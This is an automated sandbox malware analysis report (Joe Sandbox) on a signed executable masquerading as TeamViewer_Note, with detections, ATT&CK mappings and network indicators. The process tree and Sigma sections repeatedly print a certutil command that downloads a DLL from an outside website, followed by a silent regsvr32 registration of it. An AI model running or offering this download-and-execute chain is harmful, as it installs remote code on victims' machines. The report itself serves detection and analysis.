Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report cBQPecnQRp

Overview

General Information

Sample Name:cBQPecnQRp (renamed file extension from none to exe)
Analysis ID:483791
MD5:53817315b195e328ccc0f56b15b247c7
SHA1:7bedab96b89d000288b573de0b5693cf49dae47f
SHA256:ea2decec34ae3129d5da1f2035b34cff3c9f656bb4423904ef6b0a3ca5f47d5e
Tags:exeHartexLLCsigned
Infos:

Most interesting Screenshot:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:47
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Sigma detected: Regsvr32 Anomaly
Sigma detected: Suspicious Certutil Command
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • cBQPecnQRp.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\cBQPecnQRp.exe' MD5: 53817315B195E328CCC0F56B15B247C7)
    • cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 4528 cmdline: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll' MD5: D056DF596F6E02A36841E69872AEF7BD)
      • regsvr32.exe (PID: 5340 cmdline: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll', ProcessId: 5340
Sigma detected: Suspicious Certutil CommandShow sources
Source: Process startedAuthor: Florian Roth, juju4, keepwatch: Data: Command: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', CommandLine|base64offset|contains: q!, Image: C:\Windows\SysWOW64\certutil.exe, NewProcessName: C:\Windows\SysWOW64\certutil.exe, OriginalFileName: C:\Windows\SysWOW64\certutil.exe, ParentCommandLine: C:\Windows\System32\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6152, ProcessCommandLine: certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll', ProcessId: 4528

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: cBQPecnQRp.exeVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for domain / URLShow sources
Source: https://www.christchurchmvl.org/volunteer/actXApiLib.dllVirustotal: Detection: 11%Perma Link

Compliance:

barindex
Uses 32bit PE filesShow sources
Source: cBQPecnQRp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connectionsShow sources
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2
PE / OLE file has a valid certificateShow sources
Source: cBQPecnQRp.exeStatic PE information: certificate valid
Binary contains paths to debug symbolsShow sources
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00466410 FindFirstFileExW,

Networking:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\certutil.exeNetwork Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exeDomain query: www.christchurchmvl.org
Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Sep 2021 11:47:29 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: cBQPecnQRp.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cBQPecnQRp.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: cBQPecnQRp.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: cBQPecnQRp.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: cBQPecnQRp.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: cBQPecnQRp.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cBQPecnQRp.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: cBQPecnQRp.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: cBQPecnQRp.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: cBQPecnQRp.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: cBQPecnQRp.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: cBQPecnQRp.exeString found in binary or memory: https://sectigo.com/CPS0
Source: certutil.exe, 0000000A.00000002.776165001.0000000000550000.00000004.00000020.sdmpString found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dll
Source: certutil.exe, 0000000A.00000002.777469638.0000000000930000.00000004.00000040.sdmpString found in binary or memory: https://www.christchurchmvl.org/volunteer/actXApiLib.dllC:
Source: cBQPecnQRp.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownDNS traffic detected: queries for: www.christchurchmvl.org
Source: global trafficHTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: www.christchurchmvl.org
Source: global trafficHTTP traffic detected: GET /volunteer/actXApiLib.dll HTTP/1.1Accept: */*User-Agent: CertUtil URL AgentHost: www.christchurchmvl.orgCache-Control: no-cache
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknownHTTPS traffic detected: 100.26.95.170:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary:

barindex
Source: cBQPecnQRp.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004340B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00432A00
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049C051
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046207C
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004520EB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402080
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004961AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004321AB
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402210
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004443F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048C4C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004744D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049E4E7
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004024F2
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004685D0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00484580
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004025A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048E620
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402700
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045A7C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00484790
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402850
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00424970
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004029E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402B70
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00464CC9
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402CF0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00402E70
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048CFC0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0049901A
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045B2E0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004773C0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00401390
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00433450
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004454F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046B48F
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004514A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004014B0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045154D
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00433569
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004755F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046B5AF
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00401610
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00493680
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00401760
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048D7F0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004337A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00499809
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004518BF
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0048B9A0
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 00421740 appears 48 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044FEB0 appears 40 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044F762 appears 75 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 00420FA0 appears 63 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: String function: 0044F26F appears 71 times
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044E3F5 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess Stats: CPU usage > 98%
Source: cBQPecnQRp.exeBinary or memory string: OriginalFilename vs cBQPecnQRp.exe
Source: cBQPecnQRp.exe, 00000001.00000002.942739189.00000000004FD000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exeBinary or memory string: OriginalFilenameTeamViewer_Note.exe6 vs cBQPecnQRp.exe
Source: cBQPecnQRp.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: actxapilib.dll
Source: cBQPecnQRp.exeVirustotal: Detection: 10%
Source: cBQPecnQRp.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cBQPecnQRp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\Desktop\cBQPecnQRp.exe 'C:\Users\user\Desktop\cBQPecnQRp.exe'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: classification engineClassification label: mal72.evad.winEXE@8/1@2/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1368:120:WilError_01
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00422D90 LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCommand line argument: ~GI
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\certutil.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: cBQPecnQRp.exeStatic file information: File size 1363448 > 1048576
Source: cBQPecnQRp.exeStatic PE information: certificate valid
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cBQPecnQRp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb source: cBQPecnQRp.exe
Source: Binary string: E:\JA\workspace\tv_publicrelease-windows\build_cmake_win\Release\TeamViewer_Note.pdb) source: cBQPecnQRp.exe
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cBQPecnQRp.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00434A6C push eax; ret
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00410AAA push ss; iretd
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044F73C push ecx; ret
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00493990 push ecx; mov dword ptr [esp], ecx
Source: cBQPecnQRp.exeStatic PE information: section name: .didat
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044E000 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\certutil.exe TID: 6060Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\cBQPecnQRp.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044C1E6 VirtualQuery,GetSystemInfo,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00466410 FindFirstFileExW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044EE91 IsDebuggerPresent,OutputDebugStringW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A5845 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004944F0 TlsGetValue,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,TlsSetValue,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0046619E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00434891 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044ECD5 mov esi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045D9CF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044FE43 SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0045976E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0044F8B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\certutil.exeNetwork Connect: 100.26.95.170 187
Source: C:\Windows\SysWOW64\certutil.exeDomain query: www.christchurchmvl.org
Source: C:\Users\user\Desktop\cBQPecnQRp.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil.exe -urlcache -split -f 'https://www.christchurchmvl.org/volunteer/actXApiLib.dll' 'C:\ProgramData\actXApiLib.dll'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe -s -n -i 'C:\ProgramData\actXApiLib.dll'
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_0041E0FC cpuid
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_00440690 GetLocalTime,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A85C0 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,
Source: C:\Users\user\Desktop\cBQPecnQRp.exeCode function: 1_2_004A7879 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter2DLL Side-Loading1Process Injection111Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Application Shimming1DLL Side-Loading1Process Injection111LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 483791 Sample: cBQPecnQRp Startdate: 15/09/2021 Architecture: WINDOWS Score: 72 26 Multi AV Scanner detection for domain / URL 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 Sigma detected: Regsvr32 Anomaly 2->30 32 Sigma detected: Suspicious Certutil Command 2->32 7 cBQPecnQRp.exe 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        process5 11 certutil.exe 14 9->11         started        16 regsvr32.exe 9->16         started        18 conhost.exe 9->18         started        dnsIp6 22 christchurchmvl.org 100.26.95.170, 443, 49772, 49773 AMAZON-AESUS United States 11->22 24 www.christchurchmvl.org 11->24 20 C:\ProgramData\actXApiLib.dll, HTML 11->20 dropped 34 System process connects to network (likely due to code injection or exploit) 11->34 file7 signatures8

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cBQPecnQRp.exe10%VirustotalBrowse
cBQPecnQRp.exe2%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
christchurchmvl.org0%VirustotalBrowse
www.christchurchmvl.org2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
https://sectigo.com/CPS00%URL Reputationsafe
https://www.christchurchmvl.org/volunteer/actXApiLib.dll11%VirustotalBrowse
https://www.christchurchmvl.org/volunteer/actXApiLib.dll0%Avira URL Cloudsafe
